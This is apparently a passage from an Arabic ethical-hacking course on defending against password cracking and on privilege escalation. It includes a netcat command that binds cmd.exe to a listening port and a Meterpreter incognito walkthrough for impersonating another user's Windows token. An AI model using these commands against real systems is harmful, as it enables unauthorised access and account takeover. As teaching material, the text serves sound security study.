ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ،ھﻧﺎك ﺑﻌض اﻟطرق اﻟﺗﻲ ﺗﺳﺎﻋدك ﻋﻠﻰ اﻟدﻓﺎع ﻋن ﻧﻔﺳك ﺿد ﺗﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور وھم ﻛﺎﻻﺗﻰ:
-1ﻻ ﻧﺷﺎرك ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻣﻊ أي ﺷﺧص ،ﺣﯾث أن ھذا ﯾﺳﻣﺢ ﻟﺷﺧص آﺧر ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك ﻣﺛل
ﻣوظﻔﻲ اﻟدرﺟﺎت ودﻓﻊ اﻟﺑﯾﺎﻧﺎت واﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﻘﺗﺻر ﻋﺎدة ﻟك.
-2ﻻ ﺗﺳﺗﺧدم ﻧﻔس ﻛﻠﻣﺔ اﻟﻣرور أﺛﻧﺎء ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور ،أو أي واﺣد ﻣﺗﺷﺎﺑﮫ إﻟﻰ ﺣد ﻛﺑﯾر ﻣﻊ اﻟﻣﺳﺗﺧدﻣﺔ ﺳﺎﺑﻘﺎ.
-3ﺗﻣﻛﯾن ﺗدﻗﯾﻖ اﻷﻣﺎن ﻟﻠﻣﺳﺎﻋدة ﻋﻠﻰ رﺻد وﺗﺗﺑﻊ ھﺟﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور.
-4ﻻ ﺗﺳﺗﺧدم ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﯾﮭﺎ ﻓﻲ اﻟﻘﺎﻣوس.
-5ﻻ ﺗﺳﺗﺧدم اﻟﺑروﺗوﻛوﻻت ذات اﻟﻧص اﻟواﺿﺢ واﻟﺑروﺗوﻛوﻻت ذات اﻟﺗﺷﻔﯾر اﻟﺿﻌﯾف ﻓﻲ اﺗﺻﺎﻻﺗﮭم.
-6ﺗﻌﯾﯾن ﻧﮭﺞ ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور) (password change policyﻛﻠﻣﺎ ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ ،أي ،ﻛل 30ﯾوﻣﺎ.
-7ﺗﺟﻧب ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻛﺎن ﻏﯾر ﻣﺿﻣون ﻷن ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ أﻣﺎﻛن ﻣﺛل ﻣﻠﻔﺎت اﻟﻛﻣﺑﯾوﺗر ﯾﺗﻌرﺿون
ﺑﺳﮭوﻟﺔ ﻟﻠﮭﺟﻣﺎت.
-8ﻻ ﺗﺳﺗﺧدم ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ﻷي ﻧظﺎم.
-9ﺟﻌل ﻣن اﻟﺻﻌب ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﺛﻣﺎﻧﯾﺔ إﻟﻰ اﺛﻧﻲ ﻋﺷر ﺣرﻓﺎ ورﻗﻣﺎ ﻓﻲ ﻣزﯾﺞ ﻣن اﻷﺣرف اﻟﻛﺑﯾرة واﻟﺻﻐﯾرة واﻷرﻗﺎم
واﻟرﻣوز .ﻛﻠﻣﺎت ﻣرور ﻗوﯾﺔ ﯾﺻﻌب ﺗﺧﻣﯾﻧﮭﺎ .ﻛﻠﻣﺎ ازداد ﺗﻌﻘﯾد ﻛﻠﻣﺔ اﻟﻣرور ،ﻛﻠﻣﺎ ﻗل ﺧﺿوﻋﮭﺎ ﻟﻠﮭﺟﻣﺎت.
-10ﺗﺄﻛد ﻣن أن اﻟﺗطﺑﯾﻘﺎت ﻻ ﺗﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟذاﻛرة أو اﻟﻛﺗﺎﺑﺔ إﻟﻰ اﻟﻘرص .إذا ﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟذاﻛرة ﻓﺎن
ﻛﻠﻣﺎت اﻟﺳر ﯾﻣﻛن ﺳرﻗﺗﮭﺎ .وﺑﻣﺟرد ﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور ﻓﻣن اﻟﺳﮭل ﻟﻠﻐﺎﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺗﺻﻌﯾد ﺣﻘوﻗﮭم ﻓﻲ اﺳﺗﺧدام اﻟﺗطﺑﯾﻖ.
-11اﺳﺗﺧدام ﺳﻠﺳﻠﺔ ﻋﺷواﺋﯾﺔ ) (saltﻓﻲ أوﻟﮫ أو أﺧره ) (prefix or suffixﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻗﺑل ﺗﺷﻔﯾره .ﺣﯾث ﯾﺳﺗﺧدم ھذا ﻹﺑطﺎل
pre-computationو .memorizationﺣﯾث ﻧﺟد ان saltﻋﺎدة ﻣﺧﺗﻠف ﻟﺟﻣﯾﻊ اﻷﻓراد ،ﻓﺈﻧﮫ ﻣن ﻏﯾر اﻟﻌﻣﻠﻲ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﻧﺎء
اﻟﺟداول ﻣﻊ ﻧﺳﺧﺔ ﻣﺷﻔرة واﺣد ﻣن ﻛل ﻛﻠﻣﺔ اﻟﻣرور .أﻧظﻣﺔ ﯾوﻧﯾﻛس ﻋﺎدة ﺗﺳﺗﺧدم .12 bit salt
-12ﺗﻣﻛﯾن SYSKEYﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻗوﯾﺔ ﻟﺗﺷﻔﯾر وﺣﻣﺎﯾﺔ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت .SAMﻋﺎدة ،ﯾﺗم ﺗﺧزﯾن ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎﺑﺎت
اﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت .SAMﻓﻣن اﻟﺳﮭل ﺟدا ﻟﻠﺑرﻧﺎﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور اﺳﺗﮭداف ﻗﺎﻋدة ﺑﯾﺎﻧﺎت SAMﻟﻠوﺻول إﻟﻰ
ﻛﻠﻣﺎت اﻟﺳر ﻟﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن .ﻟذا ،ﻟﺗﺟﻧب ﻣﺛل ھذه اﻟﺣﺎﻻت SYSKEY ،ﯾﺄﺗﻲ ﻓﻲ اﻟﺻورة SYSKEY .ﯾوﻓر اﻟﺣﻣﺎﯾﺔ
ﻟﻠﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ ﻣرور ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ،أي اﻟﻣﺧزﻧﺔ ﻓﻲ ﺑﯾﺎﻧﺎت SAMﺿد ﺑراﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت اﻟﺗﺷﻔﯾر
اﻟﻘوﯾﺔ .ﺣﯾث اﻧﮫ أﻛﺛر ﺻﻌوﺑﺔ اﺗﺧﺎذ اﺟراءات ﻛﺳر ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺷﻔرة ﻋن ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر ﻣﺷﻔرة.
-13ﻻ ﺗﺳﺗﺧدم أﺑدا اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ وﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻣﺛل ﺗﺎرﯾﺦ اﻟﻣﯾﻼد ،اﻟزوج ،أو اﻟطﻔل أو اﺳم ﺣﯾوان أﻟﯾف .إذا ﻛﻧت
ﺗﺳﺗﺧدم ﻣﺛل ﻛﻠﻣﺎت اﻟﺳر ھذه ،ﻓﺎﻧﮫ ﯾﺻﺑﺢ ﻣن اﻟﺳﮭل ﺟدا ﻟﻠﻧﺎس اﻟذﯾن ھم ﻗرﯾب ﻣﻧك ﻛﺳر ﺗﻠك اﻟﻛﻠﻣﺎت.
-14ﻣراﻗﺑﺔ ﺳﺟﻼت اﻟﺧﺎدم ﻟﻠﻛﺷف ﻋن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ) (Brute Force attackﻋﻠﻰ ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن .ﻋﻠﻰ اﻟرﻏم ﻣن
أن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ،ﯾﺻﻌب إﯾﻘﺎﻓﮭﺎ ،وﻟﻛن ﯾﻣﻛن رﺻدھﺎ ﺑﺳﮭوﻟﺔ ﻣن ﺧﻼل رﺻد ﺳﺟل ﺧﺎدم اﻟوﯾب .ﺣﯾث ان ﻣﻊ ﻛل ﻣﺣﺎوﻟﺔ
ﺗﺳﺟﯾل دﺧول ﻓﺎﺷﻠﺔ ،ﯾﺗم ﺗﺳﺟﯾل HTTP 401 status codeﻓﻲ ﺳﺟﻼت ﺧﺎدم اﻟوﯾب اﻟﺧﺎص ﺑك.
-15ﻗﻔل اﻟﺣﺳﺎب ﺿد اﻟﺗﻌرض ﻟﻌدد ﻛﺑﯾر ﺟدا ﻣن اﻟﺗﺧﻣﯾﻧﺎت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻐﯾر ﺻﺣﯾﺣﺔ وﺗﺳﻣﻰ .password throttlingھذا ﯾوﻓر
اﻟﺣﻣﺎﯾﺔ ﺿد ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ واﻟﺗﺧﻣﯾن.
ﺗﻧﻔﯾذ وﻓرض ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ Implement and Enforce A Strong Security Policy
ﺗوﻓر ﺳﯾﺎﺳﺔ أﻣن ﻗوﯾﺔ اﻷﺳس ﻣن أﺟل اﻟﺗﻧﻔﯾذ اﻟﻧﺎﺟﺢ ﻟﻠﻣﺷﺎرﯾﻊ اﻟﻣﺗﺻﻠﺔ ﺑﺎﻷﻣن ﻓﻲ اﻟﻣﺳﺗﻘﺑل؛ وھذا ھو أول إﺟراء ﯾﺟب اﺗﺧﺎذھﺎ ﻟﻠﺣد ﻣن
ﻣﺧﺎطر اﺳﺗﺧدام اﻋﺗراض ﻣن أي ﻣن ﻣﺻﺎدر اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺷرﻛﺔ .اﻟﺧطوة اﻷوﻟﻰ ﻧﺣو زﯾﺎدة أﻣن اﻟﺷرﻛﺔ ھو إدﺧﺎل وﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ اﻷﻣن.
ﻓﺈن اﻟﺳﯾﺎﺳﺔ ﺗﺻف أﯾﺿﺎ ﺑﺗﻔﺻﯾل ﻣﻌﻧﻰ اﻻﺳﺗﺧدام اﻟﻣﻘﺑول ،ﻓﺿﻼ ﻋن إدراج اﻷﻧﺷطﺔ اﻟﻣﺣظورة.
اﻟﺗﻧﻔﯾذ اﻟﺳﻠﯾم ﻟﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ ﻣﻔﯾد ﻟﻠﻐﺎﯾﺔ ﻷﻧﮭﺎ ﺳوف ﺗﺗﺣول ﻟﯾس ﻓﻘط ﻟﺟﻣﯾﻊ اﻟﻣوظﻔﯾن اﻟﺧﺎص ﺑك إﻟﻰ اﻟﻣﺷﺎرﻛﯾن ﻓﻲ ﺟﮭود اﻟﺷرﻛﺔ ﻟﺗﺄﻣﯾن
اﻻﺗﺻﺎﻻت ،وﻟﻛن أﯾﺿﺎ ﯾﺳﺎﻋد ﻋﻠﻰ اﻟﺗﻘﻠﯾل ﻣن ﺧطر ﺣدوث ﺧرق أﻣﻧﻲ ﻣﺣﺗﻣل ﻣن ﺧﻼل اﻷﺧطﺎء " اﻹﻧﺳﺎن ﻋﺎﻣل “ .ھذه ﻋﺎدة ﻣﺎ ﺗﻛون
ﻗﺿﺎﯾﺎ ﻣﺛل اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت )ﻏﯾر اﻟﻣﺻرح ﺑﮫ( ﻏﯾر ﻣﻌروف ،واﺳﺗﺧدام ﻏﯾر آﻣن أو ﻏﯾر ﻻﺋﻖ ﻟﻺﻧﺗرﻧت واﻟﻌدﯾد ﻣن اﻷﻧﺷطﺔ اﻟﺧطرة
اﻷﺧرى.
ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك ،ﻓﺈن ﻋﻣﻠﯾﺔ وﺟود ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﺗﺳﺎﻋد أﯾﺿﺎ ﻋﻠﻰ ﺗﺣدﯾد اﻷﺻول اﻟﮭﺎﻣﺔ ﻟﻠﺷرﻛﺔ ،واﻟطرق اﻟﺗﻲ ﺑﮭﺎ ﯾﺟب أن ﺗﻛون ﻣﺣﻣﯾﺔ،
وﺳﯾﻛون أﯾﺿﺎ ﺑﻣﺛﺎﺑﺔ وﺛﯾﻘﺔ ﻣرﻛزﯾﺔ ،ﺑﻘدر ﻣﺎ ھو ﺣﻣﺎﯾﺔ اﻷﺻول اﻷﻣﻧﯾﺔ اﻟﻣﻌﻧﯾﺔ.
ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ) (Escalating privilegesھﻲ اﻟﻣرﺣﻠﺔ اﻟﺛﺎﻧﯾﺔ ﻣن ﻧظﺎم اﻟﻘرﺻﻧﺔ .ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ،ﯾﺳﺗﺧدم اﻟﻣﮭﺎﺟﻣﯾن ﻛﻠﻣﺎت اﻟﻣرور
اﻟﺗﻲ ﺗم ﻛﺳرھﺎ ﺳﺎﺑﻘﺎ ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات ذات ﻣﺳﺗوى أﻋﻠﻰ ﻣن أﺟل ﺗﻧﻔﯾذ ﻋﻣﻠﯾﺎت ﻣﮭﻣﮫ ﻟﻠﻐﺎﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف .وھﻧﺎ ﺳوف ﻧوﺿﺢ
اﻷدوات واﻟﺗﻘﻧﯾﺎت اﻟﺗﻲ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻣﺧﺗﻠﻔﺔ ﺑﺷﻛل واﺿﺢ ﻓﻲ اﻟﺷراﺋﺢ اﻟﺗﺎﻟﯾﺔ.
Privilege Escalation
ﻓﻲ ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ،ﻓﺈن اﻟﻣﮭﺎﺟم ﯾﻛﺗﺳب اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺎت واﻟﺑﯾﺎﻧﺎت واﻟﺗطﺑﯾﻘﺎت اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ ﻣن ﺧﻼل اﻻﺳﺗﻔﺎدة ﻣن ﻋﯾوب
ﻓﻲ اﻟﺗﺻﻣﯾم ،او ﻋﯾوب ﻓﻲ ﺗطﺑﯾﻖ اﻟﺑرﻣﺟﯾﺎت وإﻋداد أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑطرﯾﻘﺔ ﺳﯾﺋﺔ ،اﻟﺦ.
ﺑﻣﺟرد اﻛﺗﺳﺎب اﻟﻣﮭﺎﺟم ﺣﻖ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم ﺑﺎﻟﻌﯾد ﻣﻊ اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﺻﺎﻟﺣﮫ ،ﻓﺎﻧﮫ ﺳوف ﯾﺣﺎول زﯾﺎدة اﻣﺗﯾﺎزاﺗﮫ ﻣن ﺧﻼل
اﻟﺗﺻﻌﯾد اﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ ،ﻣﺛل ﺣﺳﺎب اﻟﻣﺳؤول) . (Admin accountﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ﺣﻖ
اﻟوﺻول إﻟﻰ ﺧﺎدم ، WZK SP1ﻓﺎﻧﮫ ﯾﻣﻛﻧﮫ ﺗﺷﻐﯾل أداة ﻣﺛل ERunAs2X.exeﻟﺗﺻﻌﯾد اﻣﺗﯾﺎزات إﻟﻰ اﻣﺗﯾﺎزات اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام"
"nc.exe -I -p 50000 -d -e cmd.exeﻣﻊ ھذه اﻻﻣﺗﯾﺎزات ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﺑﺳﮭوﻟﺔ ،وﺣذف اﻟﻣﻠﻔﺎت ،وﺣﺗﻰ ﯾﻣﻛﻧﮫ ﻧﺷر
اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ،أي ﺑرﻧﺎﻣﺞ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ ﻣﺛل ﺣﺻﺎن طروادة ،واﻟﻔﯾروﺳﺎت ،اﻟﺦ ﻓﻲ اﻟﻧظم اﻟﺿﺣﯾﺔ.
ﻟذﻟك ﻓﺎن ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻣطﻠوب وذﻟك ﻋﻧدﻣﺎ ﺗرﯾد اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ اﻷﻧظﻣﺔ اﻟﮭدف .ﻓﻲ اﻷﺳﺎس ،ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﯾﺣدث
ﻓﻲ ﺷﻛﻠﯾن .ھم ﺗﺻﻌﯾد اﻣﺗﯾﺎزات رأﺳﻲ ) (vertical privilege escalationوﺗﺻﻌﯾد اﻣﺗﯾﺎزات أﻓﻘﻲ). (Horizontal privilege escalation
ﺗﺻﻌﯾد اﻣﺗﯾﺎزات أﻓﻘﻲ) : (Horizontal privilege escalationﻓﯾﮫ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم ﻏﯾر اﻟﻣﺻرح ﺑﮫ ﻟﻠوﺻول إﻟﻰ اﻟﻣوارد واﻟوظﺎﺋف
واﻻﻣﺗﯾﺎزات اﻷﺧرى اﻟﺗﻲ ﺗﻧﺗﻣﻲ إﻟﻰ أذن ﻣﺳﺗﺧدم أﺧر أي اﻻﺛﻧﯾن ﻟﮭم ﻧﻔس اﻣﺗﯾﺎزات اﻟوﺻول .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﻣﺳﺗﺧدم Aﻟﻸﻧﺗرﻧت
اﻟﻣﺻرﻓﻲ ﯾﻣﻛﻧﮫ اﻟوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم Bاﻟﻣﺻرﻓﻲ ﺑﺳﮭوﻟﺔ.
ﺗﺻﻌﯾد اﻣﺗﯾﺎزات رأﺳﻲ) : (vertical privilege escalationﻓﯾﮫ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم اﻟﻐﯾر ﻣﺻرح ﺑﮫ اﻟوﺻول إﻟﻰ اﻟﻣوارد واﻟوظﺎﺋف ﻟﻠﻣﺳﺗﺧدم
أﺧر ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ ،ﻣﺛل اﻟﺗطﺑﯾﻖ أو ﻣدﯾري ﻣوﻗﻊ .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﻟﺷﺧص ﯾؤدى اﻟﺧدﻣﺎت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت اﻟوﺻول إﻟﻰ
ﻣوﻗﻊ ﻣﻊ اﻣﺗﯾﺎزات ﻣدﯾر ).(Administrative functions
اﻟﻣﺻدرhttp://www.password-changer.com :
Active@Password Changerھﻲ أداة ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﺳواء ﺑﺈﻋﺎدة إﻧﺷﺎء او اﺳﺗرداد اﻟﻣﺳؤول اﻟﻣﺣﻠﻲ وﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدم
وذﻟك ﻋﻧد ﻓﻘدان او ﻧﺳﯾﺎن ﻛﻠﻣﺎت ﻣرور اﻟﺧﺎﺻﺔ ﺑﻣﺳﺋوﻟﻲ اﻹدارة أو إذا ﺗم ﻏﻠﻖ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول أو ﻋطل .وﺗﺷﻣل اﻟﺳﻣﺎت
اﻟرﺋﯾﺳﯾﺔ ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻣن أﻗﺳﺎم ﻣﺗﻌددة واﻷﻗراص اﻟﺻﻠﺑﺔ ،ﻋرض واﻟﻛﺷف ﻋن ﺟﻣﯾﻊ ﻗواﻋد ﺑﯾﺎﻧﺎت ﻣﺎﯾﻛروﺳوﻓت اﻷﻣن ،إﻋﺎدة
ﺗﻌﯾﯾن /ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول ،وﻋرض ﻣﻌﻠوﻣﺎت ﻛﺎﻣﻠﺔ ﻋن أي ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﺣﻠﻲ ،اﻟﺦ
ﺑﻌد أن ﺗﻛون ﻗد ﺗﻣﻛﻧت ﻣن اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ،ﻣن اﻟﻣﮭم أن ﺗﻘوم ﺑﺗﺻﻌﯾد اﻣﺗﯾﺎزاﺗك ﻗدر اﻹﻣﻛﺎن .ﻋﻣوﻣﺎ ،ﺑﻌد اﻟوﺻول
اﻟﻰ اﻟﺟﮭﺎز ﻓﺈﻧك ﺗﻣﻠك اﻟوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ﻟدﯾﮫ اﻣﺗﯾﺎزات ﻣﻧﺧﻔﺿﺔ )ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر(؛ وﻣﻊ ذﻟك ،ﻗد ﯾﻛون ھدﻓﻧﺎ ھو ﺣﺳﺎب
اﻟﻣﺳؤول .ﻟذﻟك ﺳوف ﺗﺣﺗﺎج اﻟﻰ ﺑﻌض اﻟطرق ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك.
ﻓﻲ ھذا اﻟﺟزء ،ﺳوف ﻧﺗﻌﻠم ﻛﯾﻔﯾﺔ اﻧﺗﺣﺎل ﺷﺧﺻﯾﺔ ﻣﺳﺗﺧدم آﺧر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﺎﺳﺗﺧدام رﻣوز اﻻﻧﺗﺣﺎل). (impersonation tokens
اﻟرﻣوز) (Tokensﺗﺣﺗوي ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻷﻣﻧﯾﺔ ﻟﺟﻠﺳﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺣﯾث ﺗﺣدد اﻟﻣﺳﺗﺧدﻣﯾن واﻟﻣﺟﻣوﻋﺎت ﻟﻠﻣﺳﺗﺧدم ،واﻻﻣﺗﯾﺎزات
ﻟﻠﻣﺳﺗﺧدم .ﻋﻧد ﺗﺳﺟﯾل دﺧول ﻣﺳﺗﺧدم ﻓﻲ ﻧظﺎم وﯾﻧدوز ،ﻓﺈﻧﮭﺎ ﺗﻘدم ﻟﮫ رﻣز وﺻول) (access tokenﻛﺟزء ﻣن ﺟﻠﺳﺔ اﻟﻣﺻﺎدﻗﺔ .رﻣوز
اﻻﻧﺗﺣﺎل ) (impersonation tokensﺗﺳﻣﺢ ﻟﻧﺎ ﺑﺗﺻﻌﯾد اﻣﺗﯾﺎزات ﻟدﯾﻧﺎ ﻋن طرﯾﻖ اﻧﺗﺣﺎل ﻣﺳﺗﺧدم اﺧر .ﺣﺳﺎب اﻟﻧظﺎم)، (system account
ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﻗد ﺗﺣﺗﺎج إﻟﻰ ﺗﺷﻐﯾل ﻛﻣﺳﺗﺧدم ﻣﺳؤول ﻟدوﻣﯾن ﻟﻠﺗﻌﺎﻣل ﻣﻊ ﻣﮭﻣﺔ ﻣﺣددة ﺛم ﺗﺗﻧﺎزل ﻋن ھذه اﻟﺳﻠطﺔ ﻋﻧد اﻻﻧﺗﮭﺎء .ﻧﺣن ﺳوف
ﺗﺳﺗﺧدم ھذا اﻟﺿﻌف ﻟرﻓﻊ ﺣﻘوق اﻟوﺻول ﻟدﯾﻧﺎ.
ﻧﺑدأ اﻻن اﺳﺗﻛﺷﺎف رﻣوز اﻻﻧﺗﺣﺎل ) (impersonation tokensﻣن ﺧﻼل اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ .Meterpreterوﯾﺗم ذﻟك ﻣن -
ﺧﻼل اﺳﺗﺧدام Metasploitﻟﻣﮭﺎﺟﻣﺔ اﻟﻣﺿﯾف ﻣن أﺟل اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ Meterpreterﻛﻣﺎ ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ.
ﻟﺗﺳﮭﯾل اﻻﻣر ﺳوف ﻧﺳﺗﺧدم armitageﻛﺎﻻﺗﻰ وﻧﺣﺻل ﻣن ﺧﻼﻟﮫ ﻗذﯾﻔﺔ :Meterpreter -
ﻣن ﺧﻼل Meterpreterﻧﺑدأ ﻋﻣﻠﯾﺔ اﻻﺣﺗﻼل ﻣن ﺧﻼل اﺳﺗﺧدام incognitoﻋن طرﯾﻖ طﺑﺎﻋﺔ اﻻﻣر use incognitoﻓﻲ -
ﻗذﯾﻔﺔ Meterpreterﺛم ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻻﻣر helpﻟرؤﯾﺔ ﺟﻣﯾﻊ اﻹﻣﻛﺎﻧﯾﺎت اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ incognitoﻛﺎﻻﺗﻰ:
ﻋﻧد طﺑﺎﻋﺔ اﻻﻣر helpﺳوف ﻧﻼﻗﻰ اﻟﻌدﯾد ﻣن اﻟﻣﺳﺎﻋدات وﻟﻛن ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﻟﻣﺳﺎﻋدات اﻟﺧﺎﺻﺔ ب incognitoﻛﺎﻻﺗﻰ: -
اﻻن ﻧرﯾد اﻟﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﺳﺗﺧدﻣﯾن اﻟذﯾن ﻗﺎﻣوا ﺑﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺗﺎﺣﯾن ﺣﺎﻟﯾﺎ ﻓﻲ اﻟﻧظﺎم أو ﺗﻣﻛﻧوا ﻣن اﻟوﺻول إﻟﻰ -
اﻟﻧظﺎم ﻓﻲ اﻵوﻧﺔ اﻷﺧﯾرة .وﻧﺣن ﻧﻔﻌل ذﻟك ﻣن ﺧﻼل ﺗﻧﻔﯾذ اﻷﻣر list_tokensﻣﻊ اﻟﺧﯾﺎر )(-uﻛﺎﻻﺗﻰ:
اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ ،ﻧﻘوم ﺑﺗﺷﻐﯾل ھﺟوم اﻻﻧﺗﺣﺎل ،وذﻟك ﻣن ﺧﻼل ﺑﻧﺎء اﻟﺟﻣﻠﺔ اﻟﺗﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام impersonate_tokenﺛم ﻛﺗﺎﺑﺔ ]اﺳم -
اﻟﺣﺳﺎب ﻻﻧﺗﺣﺎل ﺻﻔﺔ[:
impersonate_token TEBA-293DD90F08\\JANA
-إذا أردﻧﺎ اﻟﻧﺟﺎح ،ﻓﻧﺣن اﻵن ﻧﺳﺗﺧدم اﻟﻧظﺎم اﻟﺣﺎﻟﻲ ﻛﻣﺳﺗﺧدم آﺧر.
اﻟﮭدف ﻣن ھﺟوم اﻻﻧﺗﺣﺎل ھو اﺧﺗﯾﺎر أﻋﻠﻰ ﻣﺳﺗوى ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﻣﻛن ،وﯾﻔﺿل ﺷﺧص ﯾرﺗﺑط أﯾﺿﺎ ﻋﺑر اﻟدوﻣﯾن ،واﺳﺗﺧدام ﺣﺳﺎﺑﮫ
ﻟﻣزﯾد ﻣن اﻟﻐوص ﻓﻲ اﻟﺷﺑﻛﺔ.
